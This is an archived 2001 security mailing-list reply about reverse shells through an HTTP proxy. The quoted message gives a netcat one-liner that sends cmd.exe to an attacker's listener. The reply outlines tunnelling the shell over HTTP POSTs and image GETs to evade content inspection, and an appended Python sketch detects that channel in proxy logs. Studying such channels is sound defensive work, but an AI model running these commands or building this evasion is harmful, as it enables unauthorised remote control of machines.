RE: Reverse Http Shell Solution
From: Frank Knobbe (FKnobbe@KnobbeITS.com)
Date: 10/19/01
Message-ID: <32CD6FE22EAB444BB1D27C10949A0E7C14FDC1@server1.home.knobbeits.com>
From: Frank Knobbe <FKnobbe@KnobbeITS.com>
To: "'GrandmastrPlague@aol.com'" <GrandmastrPlague@aol.com>, vdalesandro@proteus.com.br
Subject: RE: Reverse Http Shell Solution
Date: Thu, 18 Oct 2001 20:55:58 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
> -----Original Message-----
> From: GrandmastrPlague@aol.com [mailto:GrandmastrPlague@aol.com]
> Sent: Thursday, October 18, 2001 2:02 PM
>
> It seems like this question has been asked a million times
> before, but here goes the same old answer again... use netcat
> On attacker machine:
> nc -l -p 80
> On victim machine:
> nc -d -e cmd.exe attacker 80
>
> Make sure you set up the listening machine first.
I believe Vinícius meant that there is no way for a straight through
connection as netcat would establish, but instead the requirement to
send GET requests to the proxy which will fetch a page for you.
Netcat won't do that. You would have to have a reverse shell that
operates on an HTTP GET and PUT basis.
You could modify netcat to do that. Instead of using TCP/UDP
connections, you can replace that mechanism with HTTP GET and PUT
ways of shuffling data, pumping that back to stdin/stdout. The only
catch is to fetch the data correctly as some firewalls will do
content inspection. One way to get around that is to pump data with
POSTs to a form as normal, but receive data via GETs from images in
the web page, or just request for images à la http://h4x0r/data.gif.
Regards,
Frank
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME (X.509) encrypted email preferred.
iQA/AwUBO8+ILpytSsEygtEFEQIpdACfcW0ho5zq0dzoNYY0dWkId3qhhosAnjOo
7M3sMCeCgjkYKDpMousASMQa
=MS16
-----END PGP SIGNATURE-----
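Seen from the proxy, the channel described in this message (data out via POSTs to a form, data back via repeated GETs of an image) leaves a recognisable pattern in the access log. The following detection sketch is an added example, not part of the original post: the log format, the function names and the thresholds are assumptions, and the sample log lines are constructed.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines; assumed format: epoch client method url status bytes
SAMPLE_LOG = """\
1003438500 10.0.0.5 GET http://www.example.com/logo.gif 200 2048
1003438505 10.0.0.5 POST http://www.example.com/search.cgi 200 900
1003438530 10.0.0.5 GET http://www.example.com/logo.gif 200 2048
1003438560 10.0.0.9 POST http://tunnel.example.net/form.cgi 200 120
1003438561 10.0.0.9 GET http://tunnel.example.net/data.gif 200 311
1003438590 10.0.0.5 GET http://www.example.com/logo.gif 200 2048
1003438591 10.0.0.9 GET http://tunnel.example.net/data.gif 200 0
1003438620 10.0.0.9 POST http://tunnel.example.net/form.cgi 200 120
1003438621 10.0.0.9 GET http://tunnel.example.net/data.gif 200 1904
1003438650 10.0.0.5 GET http://www.example.com/logo.gif 200 2048
1003438651 10.0.0.9 POST http://tunnel.example.net/form.cgi 200 120
1003438652 10.0.0.9 GET http://tunnel.example.net/data.gif 200 87
this line is malformed and is skipped
"""
IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")

def parse(log):
    """Yield (client, method, url, size) for each well-formed line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 6 or not parts[5].isdigit():
            continue  # skip malformed lines
        yield parts[1], parts[2].upper(), parts[3], int(parts[5])

def find_image_polling(log, min_gets=4, min_sizes=3, min_posts=2):
    """Flag clients that re-fetch one image URL with changing sizes and also POST to that host."""
    gets = defaultdict(list)  # (client, image url) -> response sizes seen
    posts = defaultdict(int)  # (client, host) -> number of POSTs
    for client, method, url, size in parse(log):
        u = urlsplit(url)
        if method == "POST":
            posts[(client, u.hostname)] += 1
        elif method == "GET" and u.path.lower().endswith(IMAGE_EXT):
            gets[(client, url)].append(size)
    findings = []
    for (client, url), sizes in gets.items():
        n_posts = posts.get((client, urlsplit(url).hostname), 0)
        # A static image returns the same byte count every time; a data channel does not.
        if len(sizes) >= min_gets and len(set(sizes)) >= min_sizes and n_posts >= min_posts:
            findings.append({"client": client, "url": url, "gets": len(sizes),
                             "distinct_sizes": len(set(sizes)), "posts": n_posts})
    return findings

if __name__ == "__main__":
    for f in find_image_polling(SAMPLE_LOG):
        print(f)
```

The thresholds need tuning against real traffic, since dynamically generated images (counters, charts) also vary in size between requests.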
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/